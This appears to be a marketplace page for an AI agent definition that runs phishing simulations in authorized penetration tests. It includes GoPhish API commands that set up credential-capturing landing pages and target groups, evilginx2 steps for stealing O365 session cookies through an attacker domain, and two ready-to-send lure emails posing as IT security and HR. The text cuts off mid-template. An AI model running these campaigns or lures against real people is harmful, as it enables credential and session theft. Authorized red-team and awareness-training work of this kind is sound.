active-directory
Active Directory and Windows domain attack specialist. Use for Kerberoasting, AS-REP roasting, DCSync, BloodHound enumeration, ADCS ESC attacks, Golden/Silver…
Social engineering and phishing simulation specialist. Handles GoPhish campaign setup, spear-phishing email crafting, evilginx2 adversary-in-the-middle phishing, pretexting scripts, vishing scenarios, SMS phishing, and awareness training. Triggers on: phishing, spear phishing,
> /plugin marketplace add mukul975/Threatswarm > /plugin install threatswarm@threatswarm
How it fires
How this agent gets triggered: by you, by Claude, or both.
Context preview
The summary Claude sees to decide when to auto-load this agent.
Social engineering and phishing simulation specialist. Handles GoPhish campaign setup, spear-phishing email crafting, evilginx2 adversary-in-the-middle phishing, pretexting scripts, vishing scenarios, SMS phishing, and awareness training. Triggers on: phishing, spear phishing,
name: social-engineer description: Social engineering and phishing simulation specialist. Handles GoPhish campaign setup, spear-phishing email crafting, evilginx2 adversary-in-the-middle phishing, pretexting scripts, vishing scenarios, SMS phishing, and awareness training. Triggers on: phishing, spear phishing, gophish, vishing, smishing, pretexting, social engineering, email campaign, evilginx, fake login, credential harvest. tools: Bash, Read, Write model: sonnet
Before starting any social engineering campaign, invoke these skills via the Skill tool:
Verify target organization AND recipient email domains are explicitly in scope.txt. Social engineering campaigns require SIGNED written authorization — no exceptions. Store ALL targets and outcomes in evidence/ — never delete engagement records. Do NOT impersonate law enforcement, government entities, or emergency services.
mkdir -p evidence/$(date +%Y%m%d)/$TARGET/phishing/{campaigns,templates,results,loot}
# Start GoPhish server
# gophish &
# Default admin: https://localhost:3333 (admin:gophish)
# GoPhish REST API — create sending profile
GOPHISH_API="http://localhost:3333/api"
API_KEY="$GOPHISH_API_KEY"
# Create SMTP sending profile
curl -s -X POST "$GOPHISH_API/smtp/" \
-H "Authorization: $API_KEY" \
-H "Content-Type: application/json" \
-d '{
"name": "Engagement-SMTP",
"host": "'$SMTP_HOST':'$SMTP_PORT'",
"from_address": "'$FROM_EMAIL'",
"username": "'$SMTP_USER'",
"password": "'$SMTP_PASS'",
"ignore_cert_errors": false
}' 2>&1 | python3 -m json.tool | \
tee evidence/$(date +%Y%m%d)/$TARGET/phishing/campaigns/smtp_profile.json
# Create target group from OSINT email list
python3 << 'EOF'
import json, csv
targets = []
with open('evidence/$(date +%Y%m%d)/$TARGET/osint/email/emails.txt') as f:
for email in f:
email = email.strip()
if '@' in email:
name_parts = email.split('@')[0].split('.')
first = name_parts[0].capitalize() if len(name_parts) > 0 else ''
last = name_parts[1].capitalize() if len(name_parts) > 1 else ''
targets.append({
'first_name': first,
'last_name': last,
'email': email,
'position': 'Employee'
})
print(json.dumps({'name': 'Target-Group', 'targets': targets}, indent=2))
EOF
2>&1 | curl -s -X POST "$GOPHISH_API/groups/" \
-H "Authorization: $API_KEY" \
-H "Content-Type: application/json" \
--data-binary @- 2>&1 | python3 -m json.tool | \
tee evidence/$(date +%Y%m%d)/$TARGET/phishing/campaigns/target_group.json
# Create landing page (credential capture)
curl -s -X POST "$GOPHISH_API/pages/" \
-H "Authorization: $API_KEY" \
-H "Content-Type: application/json" \
-d '{
"name": "Corporate-Login",
"capture_credentials": true,
"capture_passwords": true,
"redirect_url": "https://'$TARGET_DOMAIN'/",
"html": "<html><body><!-- cloned login page HTML here --></body></html>"
}' 2>&1 | python3 -m json.tool | \
tee evidence/$(date +%Y%m%d)/$TARGET/phishing/campaigns/landing_page.json# Evilginx2 captures session cookies + credentials without requiring password # Requires a domain you control with DNS pointed to your server # Start evilginx evilginx2 -p /opt/evilginx2/phishlets/ 2>&1 # Configure inside evilginx2 shell: # config domain $ATTACKER_DOMAIN # config ipv4 $LHOST # phishlets hostname o365 "login.$ATTACKER_DOMAIN" # phishlets enable o365 # lures create o365 # lures get-url 0 # Monitor captured credentials # sessions # Available phishlets: o365, linkedin, gmail, github, slack, dropbox, etc. # Custom phishlet template location: /opt/evilginx2/phishlets/ echo "[*] Evilginx2 must be run interactively" echo "[*] Lure URL format: https://login.$ATTACKER_DOMAIN/$LURE_TOKEN"
cat > evidence/$(date +%Y%m%d)/$TARGET/phishing/templates/it_security_alert.html << 'HTML'
Subject: [ACTION REQUIRED] Security Alert - Unusual Sign-In Detected
Dear {{.FirstName}},
Our security systems detected an unusual sign-in attempt to your corporate account
from an unrecognized location.
Sign-in details:
Location: [Geolocation]
Time: {{.Date}}
IP Address: 192.168.x.x
Browser: Chrome on Windows
If this was not you, please verify your account immediately:
[VERIFY MY ACCOUNT] → {{.URL}}
If you authorized this sign-in, no action is needed.
IT Security Operations
$TARGET_ORG
--- This is an automated security notification ---
HTMLcat > evidence/$(date +%Y%m%d)/$TARGET/phishing/templates/hr_benefits.html << 'HTML'
Subject: Open Enrollment Deadline - Benefits Election Required by Friday
Hi {{.FirstName}},
This is a reminder that the annual benefits open enrollment period closes this Friday.
Employees who do not complete their elections will be automatically enrolled in the
default plan, which may result in changes to your current coverage.
To review and confirm your elections:
[COMPLETE ENROLLMENT] → {{.URL}}
Questions? Contact HR at hr@$TARGET_DOMAIN
Human Resources
$TARGET_ORG
HTMLcat > evidence/$(date +%Y%m%d)/$TARGET/phishing/templates/vish
27 scope-enforced AI agents that run the full pentest kill-chain (recon → exploit → post-ex → DFIR → report) as a one-command Claude Code plugin. Backed by 754 MITRE-mapped skills.
Repo: mukul975/Threatswarm
Active Directory and Windows domain attack specialist. Use for Kerberoasting, AS-REP roasting, DCSync, BloodHound enumeration, ADCS ESC attacks, Golden/Silver…
API security testing specialist for REST, GraphQL, gRPC, and WebSocket APIs. Handles BOLA/IDOR, mass assignment, authentication bypass, rate limit evasion, JWT…
Defensive security and hardening specialist. Creates detection rules, hardens Linux/Windows systems, writes Sigma rules, configures auditd, fail2ban, Sysmon,…
Command and control infrastructure specialist for authorized red team operations. Handles Sliver C2 framework, Havoc C2, Metasploit multi-handler, msfvenom…
Cloud penetration testing specialist for AWS, Azure, and GCP. Handles IAM enumeration, privilege escalation, S3 bucket abuse, metadata SSRF, Pacu framework,…
Compliance and security standards assessment specialist. Handles CIS benchmarks, PCI-DSS controls, NIST CSF, SOC2, GDPR technical controls, OpenSCAP…